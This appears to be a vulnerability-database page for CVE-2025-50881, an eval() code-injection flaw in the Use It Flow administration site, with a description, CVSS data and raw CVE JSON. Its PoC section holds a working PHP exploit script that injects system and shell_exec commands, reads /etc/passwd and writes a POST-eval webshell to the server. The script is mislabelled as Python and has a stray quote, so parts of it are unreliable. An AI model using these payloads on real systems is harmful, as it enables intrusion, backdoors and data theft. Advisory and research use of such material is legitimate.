Security Vulnerability Report
中文
CVE-2025-50881 CVSS 8.8 HIGH

CVE-2025-50881

Published: 2026-03-16 21:16:17
Last Modified: 2026-04-27 19:18:47
Source: [email protected]

Description

The `flow/admin/moniteur.php` script in Use It Flow administration website before 10.0.0 is vulnerable to Remote Code Execution. When handling GET requests, the script takes user-supplied input from the `action` URL parameter, performs insufficient validation, and incorporates this input into a string that is subsequently executed by the `eval()` function. Although a `method_exists()` check is performed, it only validates the part of the user input *before* the first parenthesis `(`, allowing an attacker to append arbitrary PHP code after a valid method call structure. Successful exploitation allows an unauthenticated or trivially authenticated attacker to execute arbitrary PHP code on the server with the privileges of the web server process.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Use It Flow administration website < 10.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-50881 PoC - Use It Flow RCE via action parameter * Target: flow/admin/moniteur.php * Vulnerability: Insufficient validation in eval() allows PHP code injection * * Usage: php cve-2025-50881.py <target_url> * Example: php cve-2025-50881.py http://victim.com/useitflow */ $target = $argv[1] ?? 'http://localhost'; $path = '/flow/admin/moniteur.php'; // Method 1: Basic RCE via system() $action1 = "system()*/}system('id');/*"; $url1 = "{$target}{$path}?action=" . urlencode($action1); echo "[*] Method 1: Basic RCE\n"; echo "[*] URL: {$url1}\n"; $response1 = file_get_contents($url1); echo "[+] Response:\n{$response1}\n\n"; // Method 2: Using passthru() for blind RCE $action2 = "passthru()*/}passthru('cat /etc/passwd');/*"; $url2 = "{$target}{$path}?action=" . urlencode($action2); echo "[*] Method 2: Read /etc/passwd\n"; echo "[*] URL: {$url2}\n"; $response2 = file_get_contents($url2); echo "[+] Response:\n{$response2}\n\n"; // Method 3: Using exec() to write webshell $webshell = '<?php @eval($_POST["cmd"]); ?>"'; $action3 = "file_put_contents()*/}file_put_contents('shell.php','" . $webshell . "');/*"; $url3 = "{$target}{$path}?action=" . urlencode($action3); echo "[*] Method 3: Write Webshell\n"; echo "[*] URL: {$url3}\n"; echo "[!] After execution, webshell may be available at: {$target}/shell.php\n\n"; // Method 4: Using shell_exec() $action4 = "shell_exec()*/}echo shell_exec('whoami');/*"; $url4 = "{$target}{$path}?action=" . urlencode($action4); echo "[*] Method 4: Get current user\n"; echo "[*] URL: {$url4}\n"; $response4 = file_get_contents($url4); echo "[+] Response:\n{$response4}\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50881", "sourceIdentifier": "[email protected]", "published": "2026-03-16T21:16:16.670", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The `flow/admin/moniteur.php` script in Use It Flow administration website before 10.0.0 is vulnerable to Remote Code Execution. When handling GET requests, the script takes user-supplied input from the `action` URL parameter, performs insufficient validation, and incorporates this input into a string that is subsequently executed by the `eval()` function. Although a `method_exists()` check is performed, it only validates the part of the user input *before* the first parenthesis `(`, allowing an attacker to append arbitrary PHP code after a valid method call structure. Successful exploitation allows an unauthenticated or trivially authenticated attacker to execute arbitrary PHP code on the server with the privileges of the web server process."}, {"lang": "es", "value": "El script `flow/admin/moniteur.php` en el sitio web de administración de Use It Flow anterior a 10.0.0 es vulnerable a ejecución remota de código. Al manejar solicitudes GET, el script toma la entrada proporcionada por el usuario del parámetro URL `action`, realiza una validación insuficiente e incorpora esta entrada en una cadena que es ejecutada posteriormente por la función `eval()`. Aunque se realiza una verificación `method_exists()`, solo valida la parte de la entrada del usuario *antes* del primer paréntesis `(`, permitiendo a un atacante añadir código PHP arbitrario después de una estructura de llamada a método válida. La explotación exitosa permite a un atacante no autenticado o trivialmente autenticado ejecutar código PHP arbitrario en el servidor con los privilegios del proceso del servidor web."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "http://advanced.com", "source": "[email protected]"}, {"url": "http://use.com", "source": "[email protected]"}, {"url": "https://github.com/0xdeadbit/CVE-2025-50881", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.